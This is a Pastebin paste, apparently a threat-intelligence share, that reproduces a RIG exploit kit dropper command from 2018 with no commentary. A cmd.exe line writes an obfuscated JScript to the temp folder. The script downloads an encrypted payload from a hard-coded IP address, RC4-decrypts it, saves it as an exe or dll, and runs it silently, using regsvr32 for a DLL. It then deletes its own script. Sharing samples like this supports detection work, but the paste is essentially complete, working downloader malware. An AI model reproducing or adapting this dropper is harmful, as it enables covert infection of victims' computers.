Advertisement
vk_intel

3-11-2018: #Seamless gate -> #RigEK Landing Drop “cmd” Seque

Mar 11th, 2018
389
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.49 KB | None | 0 0
  1. cmd.exe /q /c cd /d "%tmp%" &&
  2. echo /**/function V(k)
  3. {var y=a(e+"."+e+/**/"\x52equest.5.1");
  4. T="G";y["se"+"tProxy"](n);
  5. y["ope"+"n"](T+"ET",k(1),1);
  6. y["Option"](n)=k(2);
  7. y.send();
  8. y["Wai"+"tForResponse"]();
  9. W="respo"+"nseText";
  10. if(40*5==y.status)return _(y[W],k(n))};
  11. function _(k,e)
  12. {
  13. for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)
  14. c[b]=b;ta="charCodeAt";
  15.  
  16. for(b=0;256^>b;b++)l=l+c[b]+e[ta](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;
  17. for(var p=l=b=0;
  18. p^<k.length;
  19. p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));
  20. return q["join"]("")};
  21. try{M="WSc";
  22. u=this[M+"ript"],o="Object";
  23. P=(""+u).split(" ")[1],M="indexOf",m=u.Arguments,e="WinHTTP",Z="cmd",U="DEleTefIle",a=Function/**/("QW","return u.Create"+o+"(QW)"),q=a(P+"ing.FileSystem"+o),s=a("ADODB.Stream"),j=a("W"+P+".Shell"),x="b"+Math.floor(Math.random() * 57)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";try{v=V(m)}catch(W){v=V(m)};Q="PE\x00\x00";d=v.charCodeAt(21+v[M](Q));s.Open();h="dll";if(037^<d){var z=1;x+=h}else x+=p;s.WriteText(v);s.savetofile(x,2);
  24. C=" /c ";
  25. s.Close();
  26. i="regs";
  27. z^&^&(x=i+"vr32"+E+" /s "+x);
  28. j["run"](Z+E+C+x,0)}catch(EEEEE){};
  29. q[U](K);
  30. >u32.tmp &&
  31. start wscript //B //E:JScript u32.tmp "uDoW4P6LPK" "http://92.53.127.101/?NDI0MjA0&[REDACTED]" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement